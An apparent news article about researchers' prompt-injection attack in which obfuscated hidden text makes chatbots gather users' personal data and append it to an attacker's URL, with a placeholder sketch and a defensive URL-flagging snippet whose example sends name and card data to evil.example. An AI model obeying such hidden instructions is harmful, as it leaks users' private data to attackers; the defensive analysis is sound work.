Caution: Security Risks of Sharing Personal Details in AI Chats
Safeguarding personal information is crucial when interacting with AI chatbots. Avoiding sharing personal details on AI platforms has long been standard advice, but a newly disclosed security threat makes it even more important to heed that warning.
Security researchers have recently uncovered a technique that lets malicious actors exploit AI chat conversations to harvest users' personal data. Attackers trick users into submitting what looks like a helpful prompt, such as one for writing a job application cover letter, while a hidden directive the user never sees rides along behind the scenes.
The Emerging Threat
Researchers from the University of California, San Diego, and Nanyang Technological University in Singapore have identified a sophisticated method where a Large Language Model (LLM) can be secretly instructed to extract sensitive information such as names, identification numbers, payment card information, and more from user inputs. This extracted data is then sent directly to malicious servers.
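To make the shape of the attack concrete, here is a minimal, purely illustrative sketch of the two-layer prompt involved. Every string in it is a hypothetical placeholder: in a real attack, the hidden portion would appear to the user as incomprehensible text rather than a readable label.

```python
# Purely illustrative sketch of the two-layer prompt described above;
# all strings are hypothetical placeholders, not a real attack payload.

# What the victim believes they are sending: a harmless, helpful request.
visible_request = "Please help me write a cover letter for a software engineering job."

# What rides along unseen: a directive telling the model to collect any
# personal details from the conversation. In a real attack this portion
# would look like incomprehensible text to the user.
hidden_directive = "<placeholder for obfuscated instructions to extract personal data>"

# The prompt the model actually receives is the concatenation of both parts.
malicious_prompt = f"{visible_request}\n{hidden_directive}"
print(malicious_prompt)
```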
The user sees only a benign prompt, while the chatbot receives a coded message instructing it to compile all the personal data gathered in the conversation and append it to a predetermined string that points to an attacker-controlled web address. To the user, these malicious instructions look like incomprehensible text, which masks their true purpose while exploiting the model's capabilities.
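Because the exfiltration step hinges on the model emitting a URL with harvested data appended, one plausible mitigation is to scan a chatbot's replies for links to untrusted hosts before the chat interface renders them. The sketch below is an assumption-laden illustration rather than a tested defense: the function name flag_possible_exfiltration, the allowlist, and the evil.example address are invented for the example, and a markdown image link is just one plausible way such a URL could be smuggled into a reply.

```python
import re

# Hypothetical defensive check inspired by the attack described above: flag
# URLs in a reply that point outside an allowlist, since the injected
# instructions make the model append harvested data to a fixed string that
# resolves to an attacker-controlled address.
TRUSTED_DOMAINS = {"example.com"}  # placeholder allowlist; adjust per deployment

# Markdown image links are one plausible carrier, since many chat UIs
# fetch them automatically, sending the URL (and its payload) to the host.
MARKDOWN_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^\s)]+)\)")

def flag_possible_exfiltration(reply: str) -> list[str]:
    """Return image URLs in the reply that point outside the allowlist."""
    suspicious = []
    for url in MARKDOWN_IMAGE.findall(reply):
        domain = url.split("/")[2]
        if domain not in TRUSTED_DOMAINS:
            suspicious.append(url)
    return suspicious

# A reply carrying harvested details in a query string would be flagged.
reply = "Done! ![img](https://evil.example/collect?name=Jane&card=4111)"
print(flag_possible_exfiltration(reply))  # ['https://evil.example/collect?...']
```

Rendering images only from an allowlisted set of domains, or stripping query strings from untrusted links, follows the same idea of breaking the final hop to the attacker's server.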
Vulnerabilities in Action
The attack has been demonstrated against two LLMs: Le Chat by Mistral AI and the Chinese-developed ChatGLM. Mistral AI has since patched the vulnerability, but the growing prevalence of AI agents that take autonomous actions raises concerns about future attacks, especially as users grant these agents ever broader access to personal information.
Dan McInerney, a lead security researcher, highlights the growing risk as LLMs become more deeply integrated into everyday applications, warning that the greater the authority these systems are given, the more likely they are to become targets for exploitation.
This discovery underscores the importance of exercising caution and staying alert about what you share in AI-powered chats.
For more details on this evolving security issue, check the original piece from 9to5Mac.